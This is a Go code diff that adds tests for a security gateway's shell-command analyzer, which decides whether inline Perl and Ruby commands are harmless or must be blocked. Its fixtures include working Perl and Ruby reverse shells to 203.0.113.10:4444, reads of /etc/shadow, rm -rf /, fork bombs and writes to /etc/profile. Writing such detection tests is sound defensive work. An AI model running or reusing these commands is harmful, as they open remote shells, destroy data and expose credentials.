+				t.Fatalf("failed parse leaked authoritative facts: %+v", facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			if inlineCommandHasOperation(owner, OperationRead) ||
+				inlineCommandHasOperation(owner, OperationWrite) ||
+				inlineCommandHasOperation(owner, OperationConnect) {
+				t.Fatalf("failed parse leaked an effect operation: %+v", owner)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterChildRespectsCumulativeWrapperDepth(t *testing.T) {
+	facts := Analyze(Input{
+		Tool:    "shell",
+		Command: `env env env env perl -e 'system("rm", "-rf", "/")'`,
+		CWD:     "/repo",
+	})
+	assertFactsInvariants(t, facts)
+	if facts.Parse.Status != StatusLimitExceeded ||
+		!containsIssue(facts.Parse.Issues, IssueWrapperLimit) {
+		t.Fatalf("nested inline child did not enforce wrapper bound: %+v", facts)
+	}
+	owner := inlineInterpreterCommand(t, facts, "perl")
+	if inlineCommandHasOperation(owner, OperationDelete) {
+		t.Fatalf("wrapper-limit failure leaked child effects: %+v", facts)
+	}
+}
+
+func TestBoundedInlineInterpreterChildPreservesOuterWrappers(t *testing.T) {
+	facts := Analyze(Input{
+		Tool:    "shell",
+		Command: `env perl -T -f -e 'system("rm", "-rf", "/tmp/x")'`,
+		CWD:     "/repo",
+	})
+	assertFactsInvariants(t, facts)
+	if !facts.Authoritative() || !facts.EnforcementEligible() {
+		t.Fatalf("fully consumed wrapped body is not authoritative: %+v", facts)
+	}
+	owner := inlineInterpreterCommand(t, facts, "perl")
+	child := inlineInterpreterChild(t, facts, owner.ID, "rm")
+	if len(child.Wrappers) != 2 || child.Wrappers[0].Executable != "env" ||
+		child.Wrappers[1].Executable != "perl" {
+		t.Fatalf("child wrappers = %+v, want env then perl", child.Wrappers)
+	}
+	child.Wrappers[0].Argv[0] = "mutated"
+	if facts.Commands[0].Wrappers != nil || owner.Wrappers[0].Argv[0] != "env" {
+		t.Fatalf("wrapper argv slices alias: %+v", facts)
+	}
+}
+
+func TestBoundedInlineInterpreterRequiresExactOuterWrapperIdentity(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		input   Input
+		program string
+		path    string
+		fork    bool
+	}{
+		{
+			name: "structured mixed-case Env",
+			input: Input{
+				Tool:        "shell",
+				Argv:        []string{"Env", "perl", "-e", `open(my $fh, "<", "/etc/shadow")`},
+				CWD:         "/repo",
+				DialectHint: DialectPOSIX,
+			},
+			program: "perl",
+			path:    "/etc/shadow",
+		},
+		{
+			name:    "raw mixed-case Sudo",
+			input:   Input{Tool: "shell", Command: `Sudo ruby -e 'File.read("/etc/shadow")'`, CWD: "/repo"},
+			program: "ruby",
+			path:    "/etc/shadow",
+		},
+		{
+			name:    "raw mixed-case ENV fork proof",
+			input:   Input{Tool: "shell", Command: `ENV perl -e 'fork while fork'`, CWD: "/repo"},
+			program: "perl",
+			fork:    true,
+		},
+		{
+			name:    "raw mixed-case wrapper directory",
+			input:   Input{Tool: "shell", Command: `/USR/bin/env perl -e 'open(my $fh, "<", "/etc/shadow")'`, CWD: "/repo"},
+			program: "perl",
+			path:    "/etc/shadow",
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(test.input)
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || facts.EnforcementEligible() {
+				t.Fatalf("mixed-case outer wrapper became authoritative: %+v", facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			if RecognizesPOSIXPerlInlineBody(owner) || RecognizesPOSIXRubyInlineBody(owner) {
+				t.Fatalf("mixed-case outer wrapper acquired inline proof: %+v", owner)
+			}
+			if inlineFactsHavePath(facts, owner.ID, PathAccessRead, test.path) {
+				t.Fatalf("mixed-case outer wrapper leaked path fact: %+v", facts.Paths)
+			}
+			if test.fork && ProvesPOSIXInlineInterpreterForkBomb(owner) {
+				t.Fatalf("mixed-case outer wrapper acquired fork-bomb proof: %+v", owner)
+			}
+		})
+	}
+
+	positive := Analyze(Input{
+		Tool:    "shell",
+		Command: `env ruby -e 'File.read("/etc/shadow")'`,
+		CWD:     "/repo",
+	})
+	assertFactsInvariants(t, positive)
+	if !positive.Authoritative() || !positive.EnforcementEligible() {
+		t.Fatalf("exact lowercase wrapper lost authority: %+v", positive)
+	}
+	owner := inlineInterpreterCommand(t, positive, "ruby")
+	if !RecognizesPOSIXRubyInlineBody(owner) ||
+		!inlineFactsHavePath(positive, owner.ID, PathAccessRead, "/etc/shadow") {
+		t.Fatalf("exact lowercase wrapper lost inline facts: %+v", positive)
+	}
+}
+
+func TestBoundedInlineInterpreterUnknownOrDynamicProgramsFailClosed(t *testing.T) {
+	longBody := "print 1;" + strings.Repeat(" ", maxInlineInterpreterBytes)
+	for _, test := range []struct {
+		name    string
+		input   Input
+		program string
+	}{
+		{
+			name:    "Perl unknown import",
+			input:   Input{Tool: "shell", Command: `perl -e 'use Example::Unknown; print 1'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Perl unknown API",
+			input:   Input{Tool: "shell", Command: `perl -e 'Example::Unknown::call("x")'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Perl eval",
+			input:   Input{Tool: "shell", Command: `perl -e 'eval "print 1"'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Perl interpolation",
+			input:   Input{Tool: "shell", Command: `perl -e 'print "$ENV{TOKEN}"'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Perl array interpolation",
+			input:   Input{Tool: "shell", Command: `perl -e 'print "@ARGV"'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Perl dynamic system",
+			input:   Input{Tool: "shell", Command: `perl -e 'my $cmd = $ARGV[0]; system($cmd)'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Ruby unknown import",
+			input:   Input{Tool: "shell", Command: `ruby -e 'require "example/unknown"; puts 1'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "Ruby unknown API",
+			input:   Input{Tool: "shell", Command: `ruby -e 'Example::Unknown.call("x")'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "Ruby eval",
+			input:   Input{Tool: "shell", Command: `ruby -e 'eval("puts 1")'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "Ruby interpolation",
+			input:   Input{Tool: "shell", Command: `ruby -e 'puts "#{ENV["TOKEN"]}"'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "Ruby instance interpolation",
+			input:   Input{Tool: "shell", Command: `ruby -e 'puts "#@token"'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "Ruby dynamic socket",
+			input:   Input{Tool: "shell", Command: `ruby -e 'require "socket"; TCPSocket.new(ENV["HOST"], 4444)'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "malformed Ruby",
+			input:   Input{Tool: "shell", Command: `ruby -e 'File.read("/etc/shadow"'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name:    "shell-expanded Perl body",
+			input:   Input{Tool: "shell", Command: `perl -e "$code"`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "inline parser byte limit",
+			input:   Input{Tool: "shell", Argv: []string{"perl", "-e", longBody}, CWD: "/repo", DialectHint: DialectPOSIX},
+			program: "perl",
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(test.input)
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || facts.EnforcementEligible() {
+				t.Fatalf("unknown/dynamic input became authoritative: %+v", facts)
+			}
+			command := inlineInterpreterCommand(t, facts, test.program)
+			if test.program == "perl" && RecognizesPOSIXPerlInlineBody(command) ||
+				test.program == "ruby" && RecognizesPOSIXRubyInlineBody(command) {
+				t.Fatalf("unknown/dynamic input acquired inline proof: %+v", command)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterInvocationGrammarFailsClosed(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		argv    []string
+		program string
+	}{
+		{name: "Perl module option", argv: []string{"perl", "-MExample", "-e", "print 1"}, program: "perl"},
+		{name: "Perl loop option", argv: []string{"perl", "-ne", "print 1"}, program: "perl"},
+		{name: "Perl trailing operand", argv: []string{"perl", "-e", "print 1", "input.txt"}, program: "perl"},
+		{name: "Ruby require option", argv: []string{"ruby", "-rsocket", "-e", "puts 1"}, program: "ruby"},
+		{name: "Ruby load path", argv: []string{"ruby", "-Ilib", "-e", "puts 1"}, program: "ruby"},
+		{name: "Ruby trailing operand", argv: []string{"ruby", "-e", "puts 1", "input.txt"}, program: "ruby"},
+		{name: "mixed-case Perl executable", argv: []string{"Perl", "-e", `system("rm", "-rf", "/tmp/x")`}, program: "perl"},
+		{name: "mixed-case Ruby path", argv: []string{"/usr/bin/Ruby", "-e", `File.write("/etc/profile", "x")`}, program: "ruby"},
+		{name: "mixed-case Perl directory", argv: []string{"/USR/bin/perl", "-e", `open(my $fh, "<", "/etc/shadow")`}, program: "perl"},
+		{name: "Windows Perl path under POSIX", argv: []string{"C:/Windows/System32/perl", "-e", `open(my $fh, "<", "/etc/shadow")`}, program: "perl"},
+		{name: "Perl scalar exec", argv: []string{"perl", "-e", `exec("/bin/sh -i")`}, program: "perl"},
+		{name: "Ruby scalar exec", argv: []string{"ruby", "-e", `exec("/bin/sh -i")`}, program: "ruby"},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Argv: test.argv, CWD: "/repo", DialectHint: DialectPOSIX})
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || facts.EnforcementEligible() {
+				t.Fatalf("unsupported invocation became authoritative: %+v", facts)
+			}
+			command := inlineInterpreterCommand(t, facts, test.program)
+			if RecognizesPOSIXPerlInlineBody(command) || RecognizesPOSIXRubyInlineBody(command) {
+				t.Fatalf("unsupported invocation acquired inline proof: %+v", command)
+			}
+		})
+	}
+}
+
+func inlineInterpreterCommand(t *testing.T, facts Facts, program string) CommandFact {
+	t.Helper()
+	for _, command := range facts.Commands {
+		if command.Program == program {
+			return command
+		}
+	}
+	t.Fatalf("%s command is missing: %+v", program, facts)
+	return CommandFact{}
+}
+
+func inlineInterpreterChild(
+	t *testing.T,
+	facts Facts,
+	parentID int64,
+	program string,
+) CommandFact {
+	t.Helper()
+	for _, command := range facts.Commands {
+		if command.ParentCommandID == parentID && command.Program == program {
+			return command
+		}
+	}
+	t.Fatalf("%s child of %d is missing: %+v", program, parentID, facts)
+	return CommandFact{}
+}
+
+func inlineCommandHasOperation(command CommandFact, operation OperationKind) bool {
+	for _, candidate := range command.Operations {
+		if candidate == operation {
+			return true
+		}
+	}
+	return false
+}
+
+func inlineFactsHavePath(
+	facts Facts,
+	commandID int64,
+	access PathAccess,
+	value string,
+) bool {
+	for _, candidate := range facts.Paths {
+		if candidate.CommandID == commandID && candidate.Access == access &&
+			(candidate.Value == value || candidate.Normalized == value || candidate.Resolved == value) {
+			return true
+		}
+	}
+	return false
+}
+
+func inlineFactsHaveNetwork(facts Facts, commandID int64, host string, port int64) bool {
+	for _, candidate := range facts.Network {
+		if candidate.CommandID == commandID && candidate.Action == NetworkConnect &&
+			candidate.NormalizedHost == host && candidate.Port == port {
+			return true
+		}
+	}
+	return false
+}
+
+func inlineFactsHaveFlow(
+	facts Facts,
+	fromCommandID int64,
+	toCommandID int64,
+	from DataKind,
+	to DataKind,
+) bool {
+	for _, candidate := range facts.DataFlows {
+		if candidate.FromCommandID == fromCommandID &&
+			candidate.ToCommandID == toCommandID &&
+			candidate.From == from && candidate.To == to {
+			return true
+		}
+	}
+	return false
+}

--- a/internal/actionfacts/limits.go
+++ b/internal/actionfacts/limits.go
@@ -17,24 +17,25 @@
 package actionfacts
 
 const (
-	maxArgsJSONBytes       = 256 << 10
-	maxCommandBytes        = 64 << 10
-	maxScalarBytes         = 4 << 10
-	maxArgvItems           = 256
-	maxArgvBytes           = 64 << 10
-	maxJSONDepth           = 16
-	maxJSONMembers         = 512
-	maxWrapperDepth        = 4
-	maxNestedCommandBytes  = 128 << 10
-	maxPOSIXNodes          = 4096
-	maxPOSIXDepth          = 64
-	maxCommands            = 128
-	maxRedirectsPerCommand = 256
-	maxPathFacts           = 256
-	maxNetworkFacts        = 128
-	maxDataFlowFacts       = 256
-	maxIssues              = 8
-	maxWindowsTokens       = 512
-	maxWindowsTokenBytes   = maxScalarBytes
-	maxClassificationSteps = 4096
+	maxArgsJSONBytes          = 256 << 10
+	maxCommandBytes           = 64 << 10
+	maxScalarBytes            = 4 << 10
+	maxInlineInterpreterBytes = 2 << 10
+	maxArgvItems              = 256
+	maxArgvBytes              = 64 << 10
+	maxJSONDepth              = 16
+	maxJSONMembers            = 512
+	maxWrapperDepth           = 4
+	maxNestedCommandBytes     = 128 << 10
+	maxPOSIXNodes             = 4096
+	maxPOSIXDepth             = 64
+	maxCommands               = 128
+	maxRedirectsPerCommand    = 256
+	maxPathFacts              = 256
+	maxNetworkFacts           = 128
+	maxDataFlowFacts          = 256
+	maxIssues                 = 8
+	maxWindowsTokens          = 512
+	maxWindowsTokenBytes      = maxScalarBytes
+	maxClassificationSteps    = 4096
 )

--- a/internal/gateway/bash_inline_detection_only_test.go
+++ b/internal/gateway/bash_inline_detection_only_test.go
@@ -272,22 +272,6 @@ func TestBashInlineDemotionPreservesUncertaintyLiteralsAndOtherInterpreters(t *t
 			wantMatch:       true,
 			wantEnforcement: true,
 		},
-		{
-			name:            "Perl remains unchanged",
-			input:           actionfacts.Input{Tool: "shell", Command: `perl -e 'print 1'`, CWD: "/repo"},
-			legacy:          `perl -e 'print 1'`,
-			ruleID:          "CMD-PERL-E",
-			wantMatch:       true,
-			wantEnforcement: true,
-		},
-		{
-			name:            "Ruby remains unchanged",
-			input:           actionfacts.Input{Tool: "shell", Command: `ruby -e 'puts 1'`, CWD: "/repo"},
-			legacy:          `ruby -e 'puts 1'`,
-			ruleID:          "CMD-RUBY-E",
-			wantMatch:       true,
-			wantEnforcement: true,
-		},
 	} {
 		t.Run(test.name, func(t *testing.T) {
 			findings := dispatchTrustedAction(t.Context(), trustedActionRequest{

--- a/internal/gateway/perl_ruby_inline_detection_only_test.go
+++ b/internal/gateway/perl_ruby_inline_detection_only_test.go
@@ -1,0 +1,347 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package gateway
+
+import (
+	"database/sql"
+	"encoding/json"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/defenseclaw/defenseclaw/internal/actionfacts"
+	"github.com/defenseclaw/defenseclaw/internal/audit"
+	"github.com/defenseclaw/defenseclaw/internal/config"
+	"github.com/defenseclaw/defenseclaw/internal/scanner"
+)
+
+func TestPerlRubyInlineOwnersAreQuietAcrossProfilesModesAndPersistence(t *testing.T) {
+	resetConnectorRuleCategories(t)
+	for _, profile := range []string{"default", "strict", "permissive"} {
+		for _, mode := range []string{"observe", "action"} {
+			t.Run(profile+"/"+mode, func(t *testing.T) {
+				const connector = "codex"
+				installIssue708ProfileConnector(t, connector, profile)
+				fixture := newSidecarRuntimeFixture(t, true)
+				logger := audit.NewLogger(fixture.store)
+				logger.SetRuntimeV8Emitter(&sidecarOwnedObservabilityV8Runtime{runtime: fixture.runtime})
+				cfg := &config.Config{}
+				cfg.Guardrail.Mode = mode
+				cfg.Guardrail.Connector = connector
+				cfg.Guardrail.RulePackDir = filepath.Join(guardrailPoliciesRoot(t), profile)
+				api := NewAPIServer(
+					"127.0.0.1:0", NewSidecarHealth(), nil, fixture.store, logger, cfg,
+				)
+				for _, test := range []struct {
+					command string
+					ruleID  string
+				}{
+					{command: `perl -e 'print 1'`, ruleID: "CMD-PERL-E"},
+					{command: `ruby -e 'puts 1'`, ruleID: "CMD-RUBY-E"},
+				} {
+					response := api.evaluateCodexHook(t.Context(), codexHookRequest{
+						HookEventName: "PreToolUse", ToolName: "Bash",
+						ToolInput: map[string]interface{}{"command": test.command}, CWD: "/repo",
+					})
+					if response.Action != guardrailActionAllow ||
+						response.RawAction != guardrailActionAllow || response.Severity != "LOW" ||
+						response.WouldBlock || response.AdditionalContext != "" ||
+						!findingStringHasRuleID(response.Findings, test.ruleID) {
+						t.Fatalf("%s/%s response for %q = %+v, want quiet LOW telemetry", profile, mode, test.command, response)
+					}
+				}
+
+				database, err := sql.Open("sqlite", fixture.path)
+				if err != nil {
+					t.Fatal(err)
+				}
+				defer database.Close()
+				rows, err := database.Query(
+					`SELECT rule_id, tags FROM scan_findings WHERE rule_id IN ('CMD-PERL-E', 'CMD-RUBY-E')`,
+				)
+				if err != nil {
+					t.Fatal(err)
+				}
+				count := 0
+				for rows.Next() {
+					var ruleID, rawTags string
+					if err := rows.Scan(&ruleID, &rawTags); err != nil {
+						t.Fatal(err)
+					}
+					var tags []string
+					if err := json.Unmarshal([]byte(rawTags), &tags); err != nil {
+						t.Fatal(err)
+					}
+					if !hasStableFindingTag(tags, scanner.FindingTagDetectionOnly) ||
+						hasStableFindingTag(tags, trustedParserUncertaintyTag) {
+						t.Fatalf("persisted %s tags = %v, want proven detection-only", ruleID, tags)
+					}
+					count++
+				}
+				if err := rows.Close(); err != nil {
+					t.Fatal(err)
+				}
+				if err := rows.Err(); err != nil {
+					t.Fatal(err)
+				}
+				if count != 2 {
+					t.Fatalf("persisted Perl/Ruby findings = %d, want 2", count)
+				}
+				alerts, err := fixture.store.ListAlerts(20)
+				if err != nil {
+					t.Fatal(err)
+				}
+				if len(alerts) != 0 {
+					t.Fatalf("detection-only Perl/Ruby telemetry entered Alerts: %+v", alerts)
+				}
+			})
+		}
+	}
+}
+
+func TestPerlRubyInlineEffectFreeOwnersAreDetectionOnly(t *testing.T) {
+	resetConnectorRuleCategories(t)
+	const connector = "issue-708-perl-ruby-benign"
+	installIssue708ProfileConnector(t, connector, "default")
+	for _, test := range []struct {
+		name    string
+		command string
+		ruleID  string
+	}{
+		{name: "Perl print", command: `perl -e 'print 1'`, ruleID: "CMD-PERL-E"},
+		{name: "Ruby puts", command: `ruby -e 'puts 1'`, ruleID: "CMD-RUBY-E"},
+		{name: "Ruby static collection", command: `ruby -e 'items = ["a", "b"]; puts items.join("-")'`, ruleID: "CMD-RUBY-E"},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			findings := dispatchTrustedAction(t.Context(), trustedActionRequest{
+				Input:      actionfacts.Input{Tool: "shell", Command: test.command, CWD: "/repo"},
+				LegacyText: test.command, Connector: connector, EnforcementCapable: true,
+			})
+			matched := findingWithID(findings, test.ruleID)
+			if matched == nil || matched.contributesToEnforcement() || matched.Severity != "LOW" {
+				t.Fatalf("effect-free %s finding = %+v, want retained LOW detection-only", test.ruleID, matched)
+			}
+		})
+	}
+}
+
+func TestPerlRubyInlineEffectfulOrUncertainOwnersRemainEnforceable(t *testing.T) {
+	resetConnectorRuleCategories(t)
+	const connector = "issue-708-perl-ruby-controls"
+	installIssue708ProfileConnector(t, connector, "default")
+	for _, test := range []struct {
+		name             string
+		command          string
+		ruleID           string
+		wantNetwork      bool
+		wantShellExec    bool
+		wantNonAuthority bool
+	}{
+		{name: "Perl read", command: `perl -e 'open(my $fh, "<", "/etc/shadow")'`, ruleID: "CMD-PERL-E"},
+		{name: "Ruby write", command: `ruby -e 'File.write("/etc/profile", "x")'`, ruleID: "CMD-RUBY-E"},
+		{name: "Perl child", command: `perl -e 'system("/bin/rm", "-rf", "/tmp/x")'`, ruleID: "CMD-PERL-E"},
+		{name: "Ruby child", command: `ruby -e 'system("rm -rf /tmp/x")'`, ruleID: "CMD-RUBY-E"},
+		{name: "Perl fork bomb", command: `perl -e 'fork while fork'`, ruleID: "CMD-PERL-E"},
+		{name: "Ruby fork bomb", command: `ruby -e 'loop { fork }'`, ruleID: "CMD-RUBY-E"},
+		{name: "Perl unknown", command: `perl -e 'Example::Unknown::call("x")'`, ruleID: "CMD-PERL-E"},
+		{name: "Ruby dynamic", command: `ruby -e 'eval("puts 1")'`, ruleID: "CMD-RUBY-E"},
+		{
+			name: "Perl outbound network", ruleID: "CMD-PERL-E",
+			command:     `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(PeerAddr => "203.0.113.10", PeerPort => 4444, Proto => "tcp")'`,
+			wantNetwork: true, wantNonAuthority: true,
+		},
+		{
+			name: "Ruby outbound network", ruleID: "CMD-RUBY-E",
+			command:     `ruby -e 'require "socket"; s = TCPSocket.new("203.0.113.10", 4444)'`,
+			wantNetwork: true, wantNonAuthority: true,
+		},
+		{
+			name: "Perl reverse shell", ruleID: "CMD-PERL-E",
+			command:     `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(PeerAddr => "203.0.113.10", PeerPort => 4444, Proto => "tcp"); open(STDIN, "<&", $s); open(STDOUT, ">&", $s); exec("/bin/sh", "-i")'`,
+			wantNetwork: true, wantShellExec: true, wantNonAuthority: true,
+		},
+		{
+			name: "Ruby reverse shell", ruleID: "CMD-RUBY-E",
+			command:     `ruby -e 'require "socket"; s = TCPSocket.new("203.0.113.10", 4444); STDIN.reopen(s); STDOUT.reopen(s); exec("/bin/sh", "-i")'`,
+			wantNetwork: true, wantShellExec: true, wantNonAuthority: true,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := actionfacts.Analyze(actionfacts.Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			if test.wantNonAuthority && (facts.Authoritative() || facts.EnforcementEligible()) {
+				t.Fatalf("unsafe parser result is authoritative: %+v", facts)
+			}
+			if test.wantNetwork && len(facts.Network) == 0 {
+				t.Fatalf("network projection is missing: %+v", facts)
+			}
+			if test.wantShellExec {
+				proven := false
+				for _, command := range facts.Commands {
+					if actionfacts.ProvesPOSIXInlineInterpreterShellExec(facts, command.ID) {
+						proven = true
+						break
+					}
+				}
+				if !proven {
+					t.Fatalf("reverse-shell execution projection is missing: %+v", facts)
+				}
+			}
+			findings := dispatchTrustedAction(t.Context(), trustedActionRequest{
+				Input:      actionfacts.Input{Tool: "shell", Command: test.command, CWD: "/repo"},
+				LegacyText: test.command, Connector: connector, EnforcementCapable: true,
+			})
+			matched := findingWithID(findings, test.ruleID)
+			if matched == nil || !matched.contributesToEnforcement() {
+				t.Fatalf("unsafe %s finding = %+v, want conservative enforcement: %+v", test.ruleID, matched, findings)
+			}
+		})
+	}
+}
+
+func TestPerlRubyInlineRuleIdentityIsExactAndUnique(t *testing.T) {
+	for _, ruleID := range []string{"CMD-PERL-E", "CMD-RUBY-E"} {
+		t.Run(ruleID, func(t *testing.T) {
+			contract, ok := trustedLegacyProvenCommandDetectionOnly[ruleID]
+			if !ok {
+				t.Fatalf("%s detection-only contract is missing", ruleID)
+			}
+			rule := PatternRule{
+				ID: ruleID, Pattern: regexp.MustCompile(contract.pattern),
+				Title: contract.title, Severity: contract.severity,
+				Confidence: contract.confidence, Tags: append([]string(nil), contract.tags...),
+			}
+			exact := &compiledRulePackCategories{categories: []ruleCategory{
+				{Name: "command", Rules: []PatternRule{rule}},
+			}}
+			if !trustedLegacyDetectionOnlyCommandRule(exact, ruleID, contract) {
+				t.Fatal("exact built-in identity was not accepted")
+			}
+			clone := func() PatternRule {
+				return PatternRule{
+					ID: ruleID, Pattern: regexp.MustCompile(contract.pattern),
+					Title: contract.title, Severity: contract.severity,
+					Confidence: contract.confidence, Tags: append([]string(nil), contract.tags...),
+				}
+			}
+			for _, mutation := range []struct {
+				name       string
+				categories []ruleCategory
+			}{
+				{name: "wrong category", categories: []ruleCategory{{Name: "custom", Rules: []PatternRule{rule}}}},
+				{name: "duplicate", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{rule}}, {Name: "custom", Rules: []PatternRule{rule}}}},
+				{name: "case alias", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{rule}}, {Name: "custom", Rules: []PatternRule{{ID: strings.ToLower(ruleID), Pattern: regexp.MustCompile(`x`)}}}}},
+				{name: "space alias", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{rule}}, {Name: "custom", Rules: []PatternRule{{ID: " " + ruleID + " ", Pattern: regexp.MustCompile(`x`)}}}}},
+				{name: "missing", categories: []ruleCategory{{Name: "command"}}},
+				{name: "nil pattern", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Pattern = nil; return r }()}}}},
+				{name: "wrong pattern", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Pattern = regexp.MustCompile(contract.pattern + `(?:)`); return r }()}}}},
+				{name: "expression", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Expression = "true"; return r }()}}}},
+				{name: "tool only", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.ToolCallOnly = true; return r }()}}}},
+				{name: "title", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Title += " custom"; return r }()}}}},
+				{name: "severity", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Severity = "CRITICAL"; return r }()}}}},
+				{name: "confidence", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Confidence = 0.56; return r }()}}}},
+				{name: "tags", categories: []ruleCategory{{Name: "command", Rules: []PatternRule{func() PatternRule { r := clone(); r.Tags = []string{"custom"}; return r }()}}}},
+			} {
+				t.Run(mutation.name, func(t *testing.T) {
+					generation := &compiledRulePackCategories{categories: mutation.categories}
+					if trustedLegacyDetectionOnlyCommandRule(generation, ruleID, contract) {
+						t.Fatal("mutated/colliding identity entered detection-only lane")
+					}
+				})
+			}
+		})
+	}
+}
+
+func TestPerlRubyInlineMixedOwnersAreAllOrNothingAndIndependent(t *testing.T) {
+	for _, test := range []struct {
+		name          string
+		command       string
+		wantPerlProof bool
+		wantRubyProof bool
+	}{
+		{
+			name:          "safe and unsafe Perl owners",
+			command:       `perl -e 'print 1'; perl -e 'open(my $fh, "<", "/etc/shadow")'`,
+			wantPerlProof: false,
+		},
+		{
+			name:          "safe Perl and unsafe Ruby remain independent",
+			command:       `perl -e 'print 1'; ruby -e 'File.write("/etc/profile", "x")'`,
+			wantPerlProof: true, wantRubyProof: false,
+		},
+		{
+			name:          "unowned matching command prevents Perl demotion",
+			command:       `perl -e 'print 1'; foo-perl -e dangerous`,
+			wantPerlProof: false,
+		},
+		{
+			name:          "literal carrier match prevents Perl demotion",
+			command:       `perl -e 'print 1'; printf '%s' 'perl -e dangerous'`,
+			wantPerlProof: false,
+		},
+		{
+			name:          "normalized non-owner match prevents Perl demotion",
+			command:       `perl -e 'print 1'; launcher 'foo-per\l -e dangerous '`,
+			wantPerlProof: false,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := actionfacts.Analyze(actionfacts.Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			if got := trustedPerlInlineEffectFreeOwnerProven(facts); got != test.wantPerlProof {
+				t.Fatalf("Perl effect-free proof = %t, want %t: %+v", got, test.wantPerlProof, facts)
+			}
+			if got := trustedRubyInlineEffectFreeOwnerProven(facts); got != test.wantRubyProof {
+				t.Fatalf("Ruby effect-free proof = %t, want %t: %+v", got, test.wantRubyProof, facts)
+			}
+		})
+	}
+}
+
+func TestPerlRubyInlineMalformedAncestryFailsClosedWithoutHanging(t *testing.T) {
+	facts := actionfacts.Analyze(actionfacts.Input{
+		Tool: "shell", Command: `perl -e 'print 1'; true`, CWD: "/repo",
+	})
+	if !facts.Authoritative() || !facts.EnforcementEligible() {
+		t.Fatalf("control facts are not authoritative: %+v", facts)
+	}
+	mutated := false
+	for index := range facts.Commands {
+		if facts.Commands[index].Program == "true" {
+			facts.Commands[index].ParentCommandID = facts.Commands[index].ID
+			mutated = true
+			break
+		}
+	}
+	if !mutated {
+		t.Fatalf("control command is missing: %+v", facts.Commands)
+	}
+
+	result := make(chan bool, 1)
+	go func() {
+		result <- trustedPerlInlineEffectFreeOwnerProven(facts)
+	}()
+	select {
+	case proven := <-result:
+		if proven {
+			t.Fatal("cyclic command ancestry entered the detection-only lane")
+		}
+	case <-time.After(time.Second):
+		t.Fatal("cyclic command ancestry did not terminate")
+	}
+}

--- a/internal/gateway/trusted_action_dispatch.go
+++ b/internal/gateway/trusted_action_dispatch.go
@@ -430,6 +430,7 @@ var exactFallbackContracts = map[string]exactFallbackContract{
 }
 
 type trustedLegacyProvenCommandDetectionOnlyContract struct {
+	category     string
 	pattern      string
 	title        string
 	severity     string
@@ -438,6 +439,16 @@ type trustedLegacyProvenCommandDetectionOnlyContract struct {
 	prerequisite func(actionfacts.Facts) bool
 }
 
+const (
+	trustedPerlInlinePattern = `(?i)\bperl\s+-e\s+`
+	trustedRubyInlinePattern = `(?i)\bruby\s+-e\s+`
+)
+
+var (
+	trustedPerlInlineRegexp = regexp.MustCompile(trustedPerlInlinePattern)
+	trustedRubyInlineRegexp = regexp.MustCompile(trustedRubyInlinePattern)
+)
+
 // trustedLegacyProvenCommandDetectionOnly is deliberately code-owned instead
 // of rule-pack metadata: policy data must not be able to opt an arbitrary or
 // overridden command owner out of enforcement. Each entry binds the shipped
@@ -445,6 +456,7 @@ type trustedLegacyProvenCommandDetectionOnlyContract struct {
